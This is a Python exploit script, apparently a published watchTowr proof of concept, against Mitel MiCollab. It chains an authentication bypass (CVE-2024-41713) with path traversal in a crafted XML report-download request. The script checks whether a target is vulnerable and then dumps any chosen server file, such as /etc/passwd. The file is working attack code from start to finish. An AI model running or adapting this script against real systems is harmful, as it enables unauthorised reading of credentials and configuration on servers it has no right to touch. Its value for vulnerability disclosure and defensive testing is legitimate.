import requests
import argparse

banner = """			 __         ___  ___________                   
	 __  _  ______ _/  |__ ____ |  |_\\__    ____\\____  _  ________ 
	 \\ \\/ \\/ \\__  \\    ___/ ___\\|  |  \\|    | /  _ \\ \\/ \\/ \\_  __ \\
	  \\     / / __ \\|  | \\  \\___|   Y  |    |(  <_> \\     / |  | \\/
	   \\/\\_/ (____  |__|  \\___  |___|__|__  | \\__  / \\/\\_/  |__|   
				  \\/          \\/     \\/                            

        watchtowr-vs-mitel-micollab-cve-2024-41713_2024-12-05.py
        (*) Mitel MiCollab Authentication Bypass and Arbitrary File Read exploit by watchTowr
        
          - Sonny, watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2024-41713 - Authentication Bypass] - [CVE-2024-00000 - Arbitrary File Read]
"""
helptext =  """
            Example Usage:
          - python watchtowr-vs-mitel-micollab-cve-2024-41713_2024-12-05.py --url http://localhost --file /etc/passwd
			 """

parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("--url", help="target url in the format https://localhost", default=True, action="store", required=True)
parser.add_argument("--file", help="file to dump e.g. /etc/passwd", required=True, action="store")
try:
    args = parser.parse_args()
except:
    print(banner)
    print(helptext)
    raise

print(banner)


requests.urllib3.disable_warnings()

print(f"[*] Target Server: {args.url} ")
print(f"[*] Target File: {args.file} ")

exploit_url = f'{args.url}/npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2'
exploit_headers = {
    "Content-Type": "application/x-www-form-urlencoded"
}

exploit_file_str = f'<transaction xmlns:xsi="http://www.w3.org/2000/10/XMLSchema-instance" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../..{args.file}</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction>'

exploit_data = {
    "_transaction": exploit_file_str,
    "protocolVersion":"1.0",
    "__iframeTarget__":"x"
}

pre_check = requests.get(url=f'{args.url}/portal/',verify=False)

if "MiCollab End User Portal" not in pre_check.text:
    print(f"[*] Server is not Mitel MiCollab, exiting...")
    exit()

vuln_check = requests.get(url=f'{args.url}/npm-pwg/..;/usp/',verify=False)

if "<title>Search Users</title>" not in vuln_check.text:
    print(f"[*] Server is Mitel MiCollab, but it's not vulnerable to CVE-2024-41713, exiting...")
    exit()

exploit_request = requests.post(url=exploit_url,verify=False,headers=exploit_headers,data=exploit_data)

print(f"[*] File Dump: {exploit_request.text} ")